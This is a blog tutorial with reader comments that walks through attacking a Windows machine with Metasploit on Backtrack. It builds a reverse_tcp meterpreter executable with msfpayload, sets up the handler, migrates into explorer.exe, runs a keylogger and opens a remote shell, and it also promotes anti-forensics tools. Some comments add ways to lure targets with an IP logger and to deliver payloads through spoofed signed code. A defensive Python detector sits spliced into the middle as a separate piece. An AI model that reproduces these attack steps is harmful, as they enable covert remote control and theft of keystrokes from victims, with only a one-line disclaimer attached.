Metasploit
--- The Metasploit Framework ---

Note: This is an advanced topic. Read carefully. Feel free to ask any kind of query; we are always here to help you.
If you are really interested in network security, chances are you have heard of Metasploit over the last few years. Now, have you ever wondered what someone can do to your PC just by knowing your IP? Here's the answer. He could 0wn you, or in other words, he could have full access to your PC, provided you have just a few security loopholes, which may arise from something as simple as not updating your Flash player last week when it prompted you to do so. Metasploit is a hacker's best friend, mainly because it makes the job of exploitation and post-exploitation a lot easier compared to other traditional methods of hacking. The topic of Metasploit is very vast in itself. However, I'll try to keep it basic and simple so that it can be understood by everyone here. Also, Metasploit can be used with several other tools such as Nmap or Nessus (all these tools are present in Backtrack). In this tutorial, I'll be teaching you how to exploit a system using a meterpreter payload and start a keylogger on the victim's machine.
Hacking through Metasploit is done in 3 simple steps: Point, Click, 0wn.
Before I go into the details of the Metasploit Framework, let me give you a little idea of some basic terms (they may seem boring at first, but you must know them):

Vulnerability: A flaw or weakness in system security procedures, design or implementation that could be exploited, resulting in notable damage.
Exploit: A piece of software that takes advantage of a bug or vulnerability, leading to privilege escalation or DoS attacks on the target.
Overflow: An error caused when a program tries to store data beyond its size. It may be used by an attacker to execute malicious code.
Payload: The actual code which runs on the compromised system after exploitation.

Now, what IS Metasploit? It is an open source penetration testing framework, used for developing and executing attacks against target systems. It has a huge database of exploits, and it can also be used to write our own 0-day exploits.
METASPLOIT ANTI FORENSICS:

Metasploit has a great collection of tools for anti-forensics, making the forensic analysis of the compromised computer a little difficult. They are released as a part of MAFIA (Metasploit Anti Forensic Investigation Arsenal). Some of the tools included are Timestomp, Slacker, Sam Juicer and Transmogrify.

Metasploit comes in the following versions:
1. CLI (Command Line Interface)
2. Web Interface
3. MSF Console
4. MSFwx
5. MSFAPI

I would recommend using the MSF Console because of its effectiveness and power from a pentester's point of view. Another advantage of this mode is that several sessions of msfconsole can be run simultaneously.

I would recommend doing the following things in Metasploit on Backtrack (a system install or an image), avoiding the Windows version of the tool. For those who don't know, Backtrack is a Linux distro especially for security professionals, including all the tools required by a pentester. Download Backtrack from here. You can download the ISO or the VMware image, according to the one you're comfortable with. If you have physical access to more than one system, then go for the ISO image and install it on your hard disk.

Let the Hacking Begin:

Open up Backtrack. You should have a screen similar to this.
Username: root
Pass: toor

Type in the following to start the wicd network manager:

root@bt:~# /etc/init.d/wicd start

Finally, type startx to start the GUI mode:

root@bt:~# startx

First of all, know your local IP. Open up a Konsole (on the bottom left of the taskbar) and type in:

root@bt:~# ifconfig

It would be something like 192.168.x.x or 10.x.x.x. Make a note of it. Now, launch msfconsole by going to Applications >> Backtrack >> Metasploit Engineering Framework >> Framework Version 3 >> msfconsole
You should now have a shell, something similar to a command prompt in Windows:

msf >

Let's now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.

Open another shell window (Session >> New Shell, or click on the small icon on the left of the shell tab in the bottom left corner of the window).
root@bt:/opt/metasploit3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=your local ip LPORT=any port you wish X > /root/reverse_tcp.exe

Your local IP is the one you noted earlier, and for the port you could select 4444. (Everything has to be entered without quotes.) You should get something like this:

Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=192.168.255.130,LPORT=4444
root@bt:/opt/metasploit3/msf3#

Also, on your Backtrack desktop you would now see a reverse_tcp.exe file.
Migrate it to your other computer in the same local network using a thumb drive or by uploading it online.
Now open the 1st shell window with msfconsole in it, and type the following:

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.255.130
LHOST => 192.168.255.130
msf exploit(handler) > set LPORT 4444
LPORT => 4444
All the connections are set up. You have already made an executable file which makes a reverse connection to you, and now you have set the meterpreter handler to listen on port 4444. The last step is to type in exploit and press enter:

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler...

Now the handler is listening for all incoming connections on port 4444. Once the executable is run on the victim, you should see:

[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011
meterpreter > ps

Search for explorer.exe and migrate to that process:

meterpreter > migrate 5716
[*] Migrating to 5716...
[*] Migration completed successfully.
meterpreter >
Type in the following:

meterpreter > use priv

Now, if you want to start the keylogger on the victim, just type keyscan_start.

If you want a shell on the victim's computer, just type shell:

meterpreter > shell
Process 5428 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32>
You now have a command prompt. Type in whoami to see the victim's computer and user name:

C:\Windows\system32>whoami
whoami
win7-pc\win 7

C:\Windows\system32>
Let's suppose you want to start Notepad on the victim's computer. Type in:

Let's say the victim has typed something on his computer.
Just type exit to return to meterpreter. Now type in keyscan_dump to see all the captured keystrokes:

meterpreter > keyscan_dump
Dumping captured keystrokes...
GaM3 0V3R

P.S.: The above information is for educational purposes only. You should test it only against a computer you own.
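The victim-side footprint of the procedure above is what a defender can look for: the dropped executable opens an outbound connection to the handler's port, and the migrate step creates a thread in explorer.exe from that same process. The following is an added example, not code from the tutorial or from Metasploit: a small Python detector run over constructed endpoint telemetry whose record layout is a simplified assumption loosely modelled on process network-connect and remote-thread events, reusing the IP, port and PID values from the tutorial's transcript.

```python
from dataclasses import dataclass

# Processes expected to talk to arbitrary hosts, and ports that rarely warrant
# a second look on their own (both sets are illustrative assumptions).
BROWSER_LIKE = {"chrome.exe", "firefox.exe", "iexplore.exe", "outlook.exe"}
COMMON_PORTS = {80, 443, 53, 445, 139, 135, 3389}

@dataclass
class Event:
    ts: int                 # seconds since epoch (constructed)
    kind: str               # "net_connect" or "remote_thread"
    image: str              # source process image name
    pid: int
    dst_ip: str = ""        # net_connect only
    dst_port: int = 0
    target_image: str = ""  # remote_thread only
    target_pid: int = 0

def is_suspect_beacon(ev):
    """Outbound connection from a non-browser process to an uncommon port."""
    return (ev.kind == "net_connect" and ev.dst_port not in COMMON_PORTS
            and ev.image.lower() not in BROWSER_LIKE)

def detect_migrations(events, window=600):
    """Alert when a suspect beacon is followed within `window` seconds by a
    remote thread created from the same pid into another process, which is
    the footprint meterpreter's migrate leaves on the victim."""
    beacons = {}   # pid -> most recent suspect beacon from that pid
    alerts = []
    for ev in sorted(events, key=lambda e: e.ts):
        if is_suspect_beacon(ev):
            beacons[ev.pid] = ev
        elif ev.kind == "remote_thread" and ev.pid in beacons:
            b = beacons[ev.pid]
            if ev.ts - b.ts <= window:
                alerts.append({"pid": ev.pid, "image": ev.image,
                               "remote": f"{b.dst_ip}:{b.dst_port}",
                               "migrated_to": f"{ev.target_image}({ev.target_pid})"})
    return alerts

# Constructed sample telemetry; the values mirror the tutorial's transcript.
SAMPLE = [
    Event(1300030300, "net_connect", "chrome.exe", 1200, "203.0.113.5", 443),
    Event(1300030332, "net_connect", "reverse_tcp.exe", 3020, "192.168.255.130", 4444),
    Event(1300030340, "remote_thread", "reverse_tcp.exe", 3020,
          target_image="explorer.exe", target_pid=5716),
    Event(1300030350, "remote_thread", "svchost.exe", 900,
          target_image="csrss.exe", target_pid=400),
]
```

Running detect_migrations(SAMPLE) yields a single alert for pid 3020 (reverse_tcp.exe beaconing to 192.168.255.130:4444 and then injecting into explorer.exe), while the browser connection and the unrelated remote thread are ignored.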
About Author: This is a guest article written by Mr. Aditya Gupta. He is a Cyber Security Expert and C|EH Certified Ethical Hacker. His main areas of expertise include online privacy issues, web application security and wireless hacking. You can connect with him on Facebook here.
46 comments:
Anonymous Posted at: March 16, 2011 6:25 AM
nice one!
what do u mean by the 2 versions vmware and ISO? I'm running kubuntu 10.10..can i install it? which would u suggest?
I was beating around this topic for weeks. this was very very helpful, thanks yaar. keep on posting!
hey u have kept on telling what to do but how much time will it need for a newbie to be able to start exploiting himself?
Thanks everybody. @qwerty vmware is virtualization software. You can run multiple operating systems on the same machine. You don't need dual booting. You can use Backtrack on your current operating system using the backtrack vmware image. The ISO image is meant to be burned on a disk and you can install it. Use this if you don't want to run backtrack on your current os. @Saiprasad You need to explore a lot. It requires a lot of time..
Hmm, seems good. Will be trying it out soon, rather helpful. Also Aneesh, do you visit public/private hacking forums? Such as hackforums.net.
Yeah, Sometimes
Thanks for the awesome tutorial.. I have some questions though.. Does it work over the Internet too? If yes then how am I gonna get the IP Address of the target system?
Yes, it would work over the Internet too. To get the IP, one thing you can do is to use an IP logger PHP Script, host it on a free webhost, and ask the user to visit that link. It may sound a little complicated, but trust me, it's really simple. Good Luck!
Could you please share the link to some good tutorials for mastering BT? Videos or E-books? Thanks!
Metasploit Unleashed is a good place for a newbie to start. Here's the link
nice post bro.. keep it up.. but i want to know is there any change in the codes for Backtrack 5????
This one is done in a vm, but how to carry this out in a real world situation? should i first port forward or dmz my vm (bt) machine, then use my local ip or my external ip? could u please shed some light on doing this in a real world situation
How to Become a Computer Hacker Posted at: July 27, 2011 6:48 PM
Metasploit seems insanely complicated, thanks for making it that little bit clearer! This can be applied to servers, it's insane how insecure things are!
Friends, feel free to copy the articles by asking the admin, as these articles have also been taken from various other websites. . .
How can i copy the .exe file into a thumb drive in BT4...???
am using metasploit 3.7 version and this procedure is not working out :( what do i do ??
hi frndz help me plz it's all going well & i got a session also but some problem like:

[*] Started reverse handler on 192.168.255.130:4444
[*] Starting the payload handler... Now, the payload is listening for all the incoming connections on port 444.
[*] Sending stage (749056 bytes) to 192.168.255.1
[*] Meterpreter session 1 opened (192.168.255.130:4444 -> 192.168.255.1:62853) at Sun Mar 13 11:32:12 -0400 2011

dats it... it's not going any further,,, when i type session -l it shows command not found... plz helppppp
Great job! Btw, backtrack is a complex thing - why didn't u write the installation procedure? dual boot? windows 7? USB backtrack usage? Ubuntu? kindly, tell me about it!!!!! Thanks in advance, sami
anyone who wants to learn hacking or how to use metasploit commands in unix, mail me or chat with me at abhishek.jalan84@gmail.com
Is this above all possible to do in windows? I am downloading the windows version but is it possible to work the same way on it?
Nice Informative Post!! Bloggers needed for Hacking Exposed [almashackingtutorials.blogspot.com] If interested mail me at almas.malik101@gmail.com
well. i am kinda new to metasploit. I can understand most of it but i have a question. why do we have to copy the payload file? Can't we inject it into the target?
Very Nice Article : Can you Post some windows 7 ultimate , basic version exploit ... xD thanks ..
you all are fools except two, one me and the second one is the owner of this web page !!
i have the bt5 live cd, but i'm finding it difficult to configure my hsdpa modem with it. i also have ubuntu 10.6 dual booted with windows, and i've successfully configured my modem with ubuntu. how can i copy the exploiting software from the bt5 livecd to the ubuntu os? I'll really appreciate ur good response.
I get an error - metasploit 3 directory doesn't exist. I have the latest backtrack i think. seems fun. maybe i'll look more into this later.. I r confused.
it's all about your hard work and some knowledge, if you try to get into someone's pc, it takes 100 tries and only once you might succeed...in short..lots of...A LOT...of work required. Do you understand now?, in short, 99 % chances are of only failure.
This won't work for real, are people really this stupid? First off, you have to manually infect a machine. Second, you have to connect to it, it doesn't connect to you. 99% of the time the machines on the net are behind firewalls which means requirement one is out! 99% of the time the machines on the net are behind firewalls which means requirement two is out!
This isn't hacking, if you actually do this at work or on a private network, you WILL GET CAUGHT. This example is a glorified version of VNC with a hidden task tray icon. I wrote a self-installing VNC version, with no tray or installer, it self-installed with a preset pass. If you want to know what a real world example of something like this would be, I'll tell you. 1) Crack any public web server 2) Build the exact reverse of this example with Meta, so that the exe connects to you when run, then take an MD5 signed piece of trusted code, find the collisions to the hash and copy the cert to your app. Your app also needs to be an ActiveX control, or if you're not that good, make it a ClickOnce... 3) Get a VPS anonymously and set up the listener, set up a bunch and make sure they are all on different ports, or better yet, proxy the inbound connections. 4) put the signed ActiveX/ClickOnce control on the site so it auto-installs when a browser goes there. 5) Sit on your VPS, or a hacked one, and wait... That's a real world example which will actually work in the real world no problem. One tip, when searching for valid signed exes, look at the older apps... new ones are sha1.. That's right, I just told the whole world how to bypass MS security right now, and any time for the next few years no problem, there isn't a knowledgebase in the world that'll include a CRL for their ROOT CAs... No way at all. Windoz Suckz. 3dge3lite
can backtrack be used to get computer information from an ISP server, if we have the public ip of the ISP? thanks for help, freehotspot2340@yahoo.co.id
very nice tutorial, and clearly intended for pen testing purposes as well. People who want to know what a real hack looks like, try looking at card tricks, it's a bit of show and a good trick usually. But if you know how it works it's usually just a few simple steps and a show that fits the situation. Hacking is usually a bit like this, one most of the time seemingly harmless entry point gives an opportunity to hack the rest of the system. What you need to know if you want to understand how these hacks work is everything about the software used and know where the vulnerabilities are most likely to be found. The hack is done by the hacker, not by the tools!
I cannot migrate to the winlogon.exe process. It says: Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insuficient privileges) How can I get around that? The machine I'm attacking is running Windows 7 (in fact, I'm typing from it as we speak and keyscan is capturing all the keystrokes).
are surfing with proxy websites and IP spoofing the same techniques? if not, why are proxy websites constructed? if any hacker uses a proxy website for cyber crime, will he/she not be traced?????? hope that you'll reply to me!!!!
is there any difference b/w these 2 prompts in BT, root@bt: and root@root:? when I work in root@bt: all konsole functions work but in root@root it doesn't work.. I even couldn't find
the metasploit framework in root@root... how to fix this problem???? plz help me.
Ok now author, I'm using windows7 on my laptop and I heard that there is some dual os or something like that. is it possible for me to have both Linux and windows on the same laptop? if this is possible how can I go about doing it. Please mail me at: mymcsi.mymcsiworld@gmail.com